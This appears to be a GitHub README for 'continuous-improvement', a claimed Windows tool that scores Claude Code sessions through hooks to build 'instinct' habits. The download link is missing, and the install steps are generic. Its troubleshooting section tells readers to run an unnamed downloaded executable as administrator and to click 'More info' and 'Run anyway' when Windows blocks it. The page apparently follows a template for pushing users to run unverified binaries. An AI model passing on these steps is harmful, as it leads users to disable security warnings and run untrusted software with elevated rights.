continuous-improvement:为 Claude Code 构建更稳定的使用习惯
Lorriunsheared635/continuous-improvement
continuous-improvement 是一款通过 hooks 观察 Claude Code 会话并更新 instinct 置信度评分的工具,让好的行为模式增强、弱的模式消退。
⚙️ continuous-improvement - Build steadier Claude Code habits
🧭 What this does
continuous-improvement helps Claude Code build better habits over time.
It watches your sessions with hooks, checks how each session goes, and updates an instinct score based on confidence. Good patterns get stronger. Weak patterns fade. This gives Claude Code a simple way to learn from use without you having to manage it by hand.
Use it if you want:
- Better session discipline
- Clearer tool use over time
- A steady learning loop
- Less repeated bad output
- More reliable agent behavior
💻 What you need
Use a Windows PC with:
- Windows 10 or Windows 11
- A stable internet connection
- Claude Code already installed
- Enough free disk space for the app and its files
- Permission to run apps on your computer
For the best result, keep your system up to date and close other large apps while you set it up.

Visit this page to download:
On that page, look for the latest release and choose the Windows file.
🪟 Install on Windows
- Open the download page in your browser.
- Find the latest release.
- Download the Windows file for continuous-improvement.
- If the file comes as a ZIP, open it and extract the contents.
- If the file is an installer, open it and follow the prompts.
- If Windows asks for permission, choose Yes.
- Wait for the install to finish.
- Open the app from the Start menu or the folder where you saved it.
If you see more than one file, choose the one made for Windows. File names often include words like windows, win, or .exe.
🛠️ First-time setup
After you open continuous-improvement for the first time:
- Start Claude Code.
- Turn on the hook support in the app if it is not already on.
- Link the app to your Claude Code session.
- Let it read session events so it can track behavior.
- Keep the app running while you use Claude Code.
The app uses session hooks to observe actions during use. It checks each session and updates the instinct score from what it sees.
🔍 How it works
continuous-improvement uses a simple loop:
- A session starts
- Hooks watch what happens
- The app scores the session
- Strong patterns raise confidence
- Weak patterns lower confidence
- Instinct values change over time
This helps Claude Code act more consistently across tasks. It also helps reduce drift, where behavior starts clean and then gets messy after long use.
🧠 Main ideas
7-law discipline
The app supports a discipline model built around seven rules. These rules guide how the agent should work, what it should avoid, and how it should respond in a session.
Mulahazah instinct learning
Mulahazah means instinct-based learning. The app treats repeated behavior as a habit. When a pattern gets good results, the score rises. When a pattern fails, the score falls.
Confidence scoring
Each session gets a confidence score. That score helps the app decide how much weight to give a behavior pattern. This keeps the learning loop simple and stable.
Hooks
Hooks let the app observe session events. They help track actions without asking you to record anything by hand.
📁 What you may see after setup
The app may create files or folders for:
- Session logs
- Confidence scores
- Instinct history
- Hook events
- Saved settings
These files help the app keep track of progress across sessions.
▶️ How to use it
- Open continuous-improvement.
- Start Claude Code.
- Begin a normal session.
- Let the app watch the session through hooks.
- Finish the task.
- Review how the session score changed.
- Keep using it so the instinct model can learn from repeated work.
For best results, use it across many sessions. The app works by comparing patterns over time, not from one short run.
🧪 Example use case
If Claude Code keeps skipping a step, the hook data can show that pattern. The app then lowers confidence for that behavior. If Claude Code follows the right steps for several sessions, the score rises and the pattern gets stronger.
That makes the learning loop useful for:
- Coding tasks
- Prompt follow-up
- Agent behavior control
- Repeated session cleanup
- Better consistency in long work runs
⚙️ Settings you may want to check
Look for settings that control:
- Hook tracking
- Session score updates
- Learning strength
- Confidence thresholds
- Log storage
- Startup behavior
If you are new to this, keep the default settings at first. That gives you a clean baseline while the app learns your normal workflow.
🧰 Troubleshooting
The file will not open
- Make sure the download finished
- Check that you picked the Windows file
- Try running it again as administrator
- If the file is in ZIP form, extract it first
Windows blocks the app
- Open the file again
- Choose More info if you see it
- Select Run anyway if Windows shows the prompt
Claude Code does not seem connected
- Make sure Claude Code is open
- Check that hooks are enabled
- Confirm the app is running in the background
- Restart both apps and try again
Scores do not change
- Keep the app open during a live session
- Make sure session events are being captured
- Try a full task from start to finish
- Check that the hook path is set correctly
🧭 Folder and file tips
Keep the app in a fixed folder so it is easy to find later. A simple path like Downloads, Desktop, or Apps works well.
If the app stores logs beside the program file, do not move random files out of the folder. That can break the setup.
🔒 Privacy and local use
The app is built to observe session behavior and update scores. It is best to keep it on your own computer and control which sessions it can watch. If you use it in a shared setup, make sure the right user profile is active before you begin.
